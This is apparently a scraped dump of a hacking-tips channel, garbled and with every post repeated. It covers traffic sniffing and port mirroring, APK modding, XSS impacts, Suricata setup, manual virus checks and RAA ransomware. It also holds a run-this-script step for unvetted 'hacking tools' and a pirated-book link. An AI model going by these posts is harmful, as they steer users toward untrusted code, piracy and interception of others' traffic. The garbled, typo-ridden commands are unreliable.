β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦how do you intercept traffic?
How to position and set up listening equipment?
I propose to consider options for the location (connection) of equipment for sniffing in a switched environment (we will consider intercepting a wi-fi channel in the next article).
The most convenient way is to install a sniffer directly on the listening host of interest to us.
However, some of the traffic that is very useful for research, but not intended for the end device, will be discarded by the network interface and not sent for processing to the system, and therefore we will not be able to capture this traffic for further research. This traffic includes broadcast traffic within the operation of the switch.
For example, an ARP request that hosts use to determine the MAC address that corresponds to a specific IP address.
1) Knowing the IP, we send an ARP request in order to match the IP-MAC to all devices within the broadcast domain.
2) However, only the target host is βinterestedβ in receiving such a request; other hosts, as mentioned above, will discard the specified packet.
For clarity, using the Cisco Packet racer, consider how a host with IP address 192.168.1.2 sends an ARP request to host 192.168.1.4.
3) Having previously checked that there are no ARP entries on 192.168.1.2 from the word at all with the command arp -a (you can delete them using arp -d), we execute the ping command on 192.168.1.4.
4) Since we do not know the MAC address, we first send an ARP request. The request comes to the switch (cisco 2960), then it is sent to all hosts connected to the switch. After that, host 192.168.1.3 discards the specified one, and 192.168.1.4 responds accordingly.
5) In order to capture all incoming traffic on 192.168.1.3, you need to enable mixed mode of operation on the network interface . The software components Aircrack-ng, Wireshark, tcp dump, etc. allow you to do this.
6) When it is not possible to place a traffic analyzer on the target host , a hub can help .
In this case, the host under investigation and the traffic analyzer in the same switched network segment are connected to the same hub.
As a result, all incoming and outgoing packets will pass through all ports of the hub.
7) For example, by sending packets from Host1 to Host2, Hub0 will send them to both the Host2 under investigation and the Sniffer packet sniffer.
Dropping packets by the Sniffer in the picture is due to the disabled mixed mode of the network adapter
8) Port mirroring remains the most popular way to intercept traffic .
To implement this method, the switch must be manageable, and also have physical or via a remote ssh / Web interface access to it.
The point is that the incoming and outgoing traffic of the device connected to the switch port is mirrored to another switch port where the traffic analyzer is connected.
9) So, having connected, we configure the Cisco 2960 switch to mirror traffic on the fastEthernet 0/1 and fastEthernet 0/2 ports where host1 and host2 are connected, respectively:
Switch> enable
Switch # conf terminal
Switch (config) #monitor session 1 source interface fastEthernet 0/1
Switch (config) #monitor session 1 source interface fastEthernet 0/2
And the port to which the traffic will be mirrored, where the packet analyzer is connected:
Switch (config) #monitor session 1 destination interface f0 / 24
Let's check:
Switch # show monitor
don't clone our tutorials :)
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦how do you intercept traffic?
How to position and set up listening equipment?
I propose to consider options for the location (connection) of equipment for sniffing in a switched environment (we will consider intercepting a wi-fi channel in the next article).
The most convenient way is to install a sniffer directly on the listening host of interest to us.
However, some of the traffic that is very useful for research, but not intended for the end device, will be discarded by the network interface and not sent for processing to the system, and therefore we will not be able to capture this traffic for further research. This traffic includes broadcast traffic within the operation of the switch.
For example, an ARP request that hosts use to determine the MAC address that corresponds to a specific IP address.
1) Knowing the IP, we send an ARP request in order to match the IP-MAC to all devices within the broadcast domain.
2) However, only the target host is βinterestedβ in receiving such a request; other hosts, as mentioned above, will discard the specified packet.
For clarity, using the Cisco Packet racer, consider how a host with IP address 192.168.1.2 sends an ARP request to host 192.168.1.4.
3) Having previously checked that there are no ARP entries on 192.168.1.2 from the word at all with the command arp -a (you can delete them using arp -d), we execute the ping command on 192.168.1.4.
4) Since we do not know the MAC address, we first send an ARP request. The request comes to the switch (cisco 2960), then it is sent to all hosts connected to the switch. After that, host 192.168.1.3 discards the specified one, and 192.168.1.4 responds accordingly.
5) In order to capture all incoming traffic on 192.168.1.3, you need to enable mixed mode of operation on the network interface . The software components Aircrack-ng, Wireshark, tcp dump, etc. allow you to do this.
6) When it is not possible to place a traffic analyzer on the target host , a hub can help .
In this case, the host under investigation and the traffic analyzer in the same switched network segment are connected to the same hub.
As a result, all incoming and outgoing packets will pass through all ports of the hub.
7) For example, by sending packets from Host1 to Host2, Hub0 will send them to both the Host2 under investigation and the Sniffer packet sniffer.
Dropping packets by the Sniffer in the picture is due to the disabled mixed mode of the network adapter
8) Port mirroring remains the most popular way to intercept traffic .
To implement this method, the switch must be manageable, and also have physical or via a remote ssh / Web interface access to it.
The point is that the incoming and outgoing traffic of the device connected to the switch port is mirrored to another switch port where the traffic analyzer is connected.
9) So, having connected, we configure the Cisco 2960 switch to mirror traffic on the fastEthernet 0/1 and fastEthernet 0/2 ports where host1 and host2 are connected, respectively:
Switch> enable
Switch # conf terminal
Switch (config) #monitor session 1 source interface fastEthernet 0/1
Switch (config) #monitor session 1 source interface fastEthernet 0/2
And the port to which the traffic will be mirrored, where the packet analyzer is connected:
Switch (config) #monitor session 1 destination interface f0 / 24
Let's check:
Switch # show monitor
don't clone our tutorials :)
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Some termux hacking tools:
1) git clone https://github.com/
2) AnonHackerr/toolss.git
3) cd toolss
4) chmod +x Tools.py
5) python Tools.py
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Some termux hacking tools:
1) git clone https://github.com/
2) AnonHackerr/toolss.git
3) cd toolss
4) chmod +x Tools.py
5) python Tools.py
β β β Uππ»βΊπ«Δπ¬πβ β β β
original Hacking The Art of Exploitation Ebook
http://www.mediafire.com/file/ht5dy5dwmf4h0j7/hacking-the-art-of-exploitation.pdf
http://www.mediafire.com/file/ht5dy5dwmf4h0j7/hacking-the-art-of-exploitation.pdf
MediaFire
hacking-the-art-of-exploitation
MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Install Suricata IDS on Linux
Might as well build Suricata from source code. You have to install a few required dependencies first, as shown below.
Install dependencies on Debian, Ubuntu or Linux Mint
1) $ sudo apt-get install wget build-essential libpcre3-dev libpcre3-dbg automake autoconf libtool libpcap-dev libnet1-dev libyaml-dev zlib1g-dev libcap-ng-dev libjansson-dev
install dependencies on CentOS, Fedora or RHEL
2) $ sudo yum install wget libpcap-devel libnet-devel pcre-devel gcc-c++ automake autoconf libtool make libyaml-devel zlib-devel file-devel jansson-devel nss-devel
3) Once you have installed all the necessary packages, you can now install Suricata , As shown below.
First, download the latest Suricata source code from http://suricata-ids.org/download/ and compile the code.
4) Now compile and install it.
$ make
$ sudo make install
Suricata source code comes with default configuration files. May wish to install these default configuration files as shown below.
$ sudo make install-conf
5) As you know, Suricata is useless without the IDS rule set. Conveniently, the Makefile comes with IDS rules installation options. To install IDS rules, just run the following command.
$ sudo make install-rules
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Install Suricata IDS on Linux
Might as well build Suricata from source code. You have to install a few required dependencies first, as shown below.
Install dependencies on Debian, Ubuntu or Linux Mint
1) $ sudo apt-get install wget build-essential libpcre3-dev libpcre3-dbg automake autoconf libtool libpcap-dev libnet1-dev libyaml-dev zlib1g-dev libcap-ng-dev libjansson-dev
install dependencies on CentOS, Fedora or RHEL
2) $ sudo yum install wget libpcap-devel libnet-devel pcre-devel gcc-c++ automake autoconf libtool make libyaml-devel zlib-devel file-devel jansson-devel nss-devel
3) Once you have installed all the necessary packages, you can now install Suricata , As shown below.
First, download the latest Suricata source code from http://suricata-ids.org/download/ and compile the code.
4) Now compile and install it.
$ make
$ sudo make install
Suricata source code comes with default configuration files. May wish to install these default configuration files as shown below.
$ sudo make install-conf
5) As you know, Suricata is useless without the IDS rule set. Conveniently, the Makefile comes with IDS rules installation options. To install IDS rules, just run the following command.
$ sudo make install-rules
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME GOOD ANDROID APPS FOR RECOVER LOST DATA"
https://play.google.com/store/apps/details?id=com.wondershare.drfone
https://play.google.com/store/apps/dev?id=6817647156581849686
https://play.google.com/store/apps/details?id=com.easeus.mobisaver
https://play.google.com/store/apps/developer?id=EaseUS+Data+Recovery+Software
https://play.google.com/store/apps/details?id=video.recovery
https://play.google.com/store/apps/developer?id=Tasty+Blueberry+PI
https://play.google.com/store/apps/details?id=com.defianttech.diskdigger
https://play.google.com/store/apps/developer?id=Defiant+Technologies,+LLC
https://play.google.com/store/apps/details?
id=com.greatstuffapps.digdeep
https://play.google.com/store/apps/developer?id=GreatStuffApps
https://play.google.com/store/apps/details?id=photo.recovery
https://play.google.com/store/apps/developer?id=Tasty+Blueberry+PI
https://play.google.com/store/apps/details?id=com.auntec.photo
https://play.google.com/store/apps/developer?id=Suzhou+Aunbox+Software+Co.+Ltd.
https://play.google.com/store/apps/details?id=com.baloota.dumpster
https://play.google.com/store/apps/dev?id=5104976176358171231
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME GOOD ANDROID APPS FOR RECOVER LOST DATA"
https://play.google.com/store/apps/details?id=com.wondershare.drfone
https://play.google.com/store/apps/dev?id=6817647156581849686
https://play.google.com/store/apps/details?id=com.easeus.mobisaver
https://play.google.com/store/apps/developer?id=EaseUS+Data+Recovery+Software
https://play.google.com/store/apps/details?id=video.recovery
https://play.google.com/store/apps/developer?id=Tasty+Blueberry+PI
https://play.google.com/store/apps/details?id=com.defianttech.diskdigger
https://play.google.com/store/apps/developer?id=Defiant+Technologies,+LLC
https://play.google.com/store/apps/details?
id=com.greatstuffapps.digdeep
https://play.google.com/store/apps/developer?id=GreatStuffApps
https://play.google.com/store/apps/details?id=photo.recovery
https://play.google.com/store/apps/developer?id=Tasty+Blueberry+PI
https://play.google.com/store/apps/details?id=com.auntec.photo
https://play.google.com/store/apps/developer?id=Suzhou+Aunbox+Software+Co.+Ltd.
https://play.google.com/store/apps/details?id=com.baloota.dumpster
https://play.google.com/store/apps/dev?id=5104976176358171231
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Mod your own apk
#fastTips
source code: https://github.com/kaleemullah360/android-APK-Mods
1) Load APK
java -jar apktool.jar if application-name.apk
2) Decode APK
java -jar apktool.jar decode application-name.apk
3) Recompile APK
java -jar apktool.jar b application-name.apk
4) Add signature using APK Signer
java -jar apk-signer-1.8.5.jar certificate.pem key.pk8 application-name.apk
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Mod your own apk
#fastTips
source code: https://github.com/kaleemullah360/android-APK-Mods
1) Load APK
java -jar apktool.jar if application-name.apk
2) Decode APK
java -jar apktool.jar decode application-name.apk
3) Recompile APK
java -jar apktool.jar b application-name.apk
4) Add signature using APK Signer
java -jar apk-signer-1.8.5.jar certificate.pem key.pk8 application-name.apk
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - kaleemullah360/android-APK-Mods: Hack into android applications, some tools and instructions. decode, modify and recompileβ¦
:sparkles: Hack into android applications, some tools and instructions. decode, modify and recompile APK :sparkles: - GitHub - kaleemullah360/android-APK-Mods: Hack into android applications, some ...
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Speedup mega download and more:
Get file details and information
Download the file
Read file and Decrypt it
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
first download https://github.com/BaseMax/MegaDownloader
step 1: make api call to mega api server get info about the file with download link api return filename,filesize,download link filename is encrypted string
step 2: we download the encrypted file using the url returned in step 1 api response
step 3: after download decrypt the file
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Speedup mega download and more:
Get file details and information
Download the file
Read file and Decrypt it
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
first download https://github.com/BaseMax/MegaDownloader
step 1: make api call to mega api server get info about the file with download link api return filename,filesize,download link filename is encrypted string
step 2: we download the encrypted file using the url returned in step 1 api response
step 3: after download decrypt the file
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - BaseMax/MegaDownloader: A script to download file from Mega.n and read it. (Using PHP)
A script to download file from Mega.n and read it. (Using PHP) - BaseMax/MegaDownloader
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What can XSS do?
Before we learn the use of XSS, it is necessary for us to know what XSS can do? Or what kind of harm:
Β· Alter the page, modify the content of the page
Β· Phishing
Β· Steal user cookies
Β· Hijack user (browser) sessions
Β· Hang ads, brush traffic
Β· DDoS
Β· Web page hanging horse
Β· Get ββclient information (such as UA, IP, open port)
Β· Spread XSS Worm
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What can XSS do?
Before we learn the use of XSS, it is necessary for us to know what XSS can do? Or what kind of harm:
Β· Alter the page, modify the content of the page
Β· Phishing
Β· Steal user cookies
Β· Hijack user (browser) sessions
Β· Hang ads, brush traffic
Β· DDoS
Β· Web page hanging horse
Β· Get ββclient information (such as UA, IP, open port)
Β· Spread XSS Worm
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to use the system's built-in commands to get manual antivirus ?
1) Start point Before doing it yourself, remember to be prepared-use TaskList to backup system processes
New viruses have learned to use processes to hide themselves, so we'd better back up the computer's process list when the system is normal. Of course, it's best to back up without running any programs when entering Windows, so that the computer will feel abnormal in the future. You can find the process that may be a virus by comparing the process list.
Enter at the command prompt:
TaskList /fo:csv>g:zc.csv
The function of the above command is to output the current process list in csv format to the "zc.csv" file, g: is the disk you want to save to, and you can open the file with Excel.
2) When you do it yourself, you must be eye-catching-use FC to compare process list files
If you feel that your computer is abnormal, or you know that there is a virus epidemic recently, then it is necessary to check it.
Enter the command prompt and enter the following commands:
TaskList /fo:csv>g:yc.csv
Generate a list of yc.csv files of the current process, and then enter:
FC g:\zccsv g:\yc.csy
After pressing Enter, you can see the difference between the front and rear list files. Through comparison, it is found that the computer has an extra abnormal process named "Winion0n.exe" (here we take this process as an example) and not "Winionon.exe".
3) When making a judgment, remember that the evidence is conclusive-use Netstat to view open ports
For such a suspicious process, how to judge whether it is a virus? According to most viruses (especially Trojan horses) will spread the virus through the port to connect to the outside, you can check the port occupancy.
Enter at the command prompt:
Netstat -ano
The meaning of the parameters is as follows:
a: Display all port information that establishes a connection with the host
n: Display the PID code of the process of opening the port
o: Display address and port information in digital format
After you press Enter, you can see all open ports and external connection processes. Here, a process with PID 1756 (take this as an example) is the most suspicious. Its status is "ESTABLISHED". You can know that this process is "Winion0n" through the task manager. .exe", you can judge that this is an illegal connection by checking the network program running on this machine!
The meaning of the connection parameters is as follows:
LISTENINC: indicates that it is in the listening state, that is, the port is open, waiting for connection, but has not been connected yet, only the service port of the TCP protocol can be in the LISTENINC state.
ESTABLISHED means to establish a connection.
Indicates that the two machines are communicating.
TIME-WAIT means the end of this connection.
It indicates that the port has been accessed once, but the access is over. It is used to determine whether an external computer is connected to the machine.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to use the system's built-in commands to get manual antivirus ?
1) Start point Before doing it yourself, remember to be prepared-use TaskList to backup system processes
New viruses have learned to use processes to hide themselves, so we'd better back up the computer's process list when the system is normal. Of course, it's best to back up without running any programs when entering Windows, so that the computer will feel abnormal in the future. You can find the process that may be a virus by comparing the process list.
Enter at the command prompt:
TaskList /fo:csv>g:zc.csv
The function of the above command is to output the current process list in csv format to the "zc.csv" file, g: is the disk you want to save to, and you can open the file with Excel.
2) When you do it yourself, you must be eye-catching-use FC to compare process list files
If you feel that your computer is abnormal, or you know that there is a virus epidemic recently, then it is necessary to check it.
Enter the command prompt and enter the following commands:
TaskList /fo:csv>g:yc.csv
Generate a list of yc.csv files of the current process, and then enter:
FC g:\zccsv g:\yc.csy
After pressing Enter, you can see the difference between the front and rear list files. Through comparison, it is found that the computer has an extra abnormal process named "Winion0n.exe" (here we take this process as an example) and not "Winionon.exe".
3) When making a judgment, remember that the evidence is conclusive-use Netstat to view open ports
For such a suspicious process, how to judge whether it is a virus? According to most viruses (especially Trojan horses) will spread the virus through the port to connect to the outside, you can check the port occupancy.
Enter at the command prompt:
Netstat -ano
The meaning of the parameters is as follows:
a: Display all port information that establishes a connection with the host
n: Display the PID code of the process of opening the port
o: Display address and port information in digital format
After you press Enter, you can see all open ports and external connection processes. Here, a process with PID 1756 (take this as an example) is the most suspicious. Its status is "ESTABLISHED". You can know that this process is "Winion0n" through the task manager. .exe", you can judge that this is an illegal connection by checking the network program running on this machine!
The meaning of the connection parameters is as follows:
LISTENINC: indicates that it is in the listening state, that is, the port is open, waiting for connection, but has not been connected yet, only the service port of the TCP protocol can be in the LISTENINC state.
ESTABLISHED means to establish a connection.
Indicates that the two machines are communicating.
TIME-WAIT means the end of this connection.
It indicates that the port has been accessed once, but the access is over. It is used to determine whether an external computer is connected to the machine.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦JavaScript email attachments may carry malicious code ?
Most malicious software in Windows is written in a compiled language such as C or C++ and spread in the form of executable files such as .exe or .dll. Other malware is written using command-line scripts, such as Windows batch or PowerShell.
The malware on the client side is rarely written in web-related languages, such as JavaScript, which is mainly interpreted by the browser. But the built-in Script Host in Windows can also directly execute .js files.
Attackers have only recently started using this technique. Last month, Microsoft warned that js attachments in malicious emails might carry viruses, and ESETβs Security Research Institute also warned that some js attachments might run Locky virus. But in both cases, JavaScript files are used as a downloader of malware. They download from other addresses and install traditional malware written in other languages ββby default. But RAA is different. This is malware written entirely in JavaScript.
Experts in the BleepingComputer.com technical support forum said that RAA relies on CryptoJS, a secure JavaScript library, to implement its encryption process. The implementation of encryption is very solid, using the AES-256 encryption algorithm.
Once the file is encrypted, RAA will add .locked to the suffix of the original file name. Its encryption targets include: .doc, .xls, .rtf, .pdf, .dbf, .jpg, .dwg, .cdr, .psd, .cd, .mdb, .png, .lcd, .zip, .rar And .csv.
Lawrence Abrams, the founder of BleepingComputer.com, said in a blog: "In the current situation, there is no way to decrypt it except for payment.
According to the user's response, after being infected with RAA, messages in Russian will be randomly displayed, but even if its target is a Russian computer, its proliferation is only a matter of time.
It is very unusual to include JavaScript attachments in emails, so users should avoid opening such files even if they are contained in .zip archives. .js files are rarely used in other places except in websites and browsers.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦JavaScript email attachments may carry malicious code ?
Most malicious software in Windows is written in a compiled language such as C or C++ and spread in the form of executable files such as .exe or .dll. Other malware is written using command-line scripts, such as Windows batch or PowerShell.
The malware on the client side is rarely written in web-related languages, such as JavaScript, which is mainly interpreted by the browser. But the built-in Script Host in Windows can also directly execute .js files.
Attackers have only recently started using this technique. Last month, Microsoft warned that js attachments in malicious emails might carry viruses, and ESETβs Security Research Institute also warned that some js attachments might run Locky virus. But in both cases, JavaScript files are used as a downloader of malware. They download from other addresses and install traditional malware written in other languages ββby default. But RAA is different. This is malware written entirely in JavaScript.
Experts in the BleepingComputer.com technical support forum said that RAA relies on CryptoJS, a secure JavaScript library, to implement its encryption process. The implementation of encryption is very solid, using the AES-256 encryption algorithm.
Once the file is encrypted, RAA will add .locked to the suffix of the original file name. Its encryption targets include: .doc, .xls, .rtf, .pdf, .dbf, .jpg, .dwg, .cdr, .psd, .cd, .mdb, .png, .lcd, .zip, .rar And .csv.
Lawrence Abrams, the founder of BleepingComputer.com, said in a blog: "In the current situation, there is no way to decrypt it except for payment.
According to the user's response, after being infected with RAA, messages in Russian will be randomly displayed, but even if its target is a Russian computer, its proliferation is only a matter of time.
It is very unusual to include JavaScript attachments in emails, so users should avoid opening such files even if they are contained in .zip archives. .js files are rarely used in other places except in websites and browsers.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β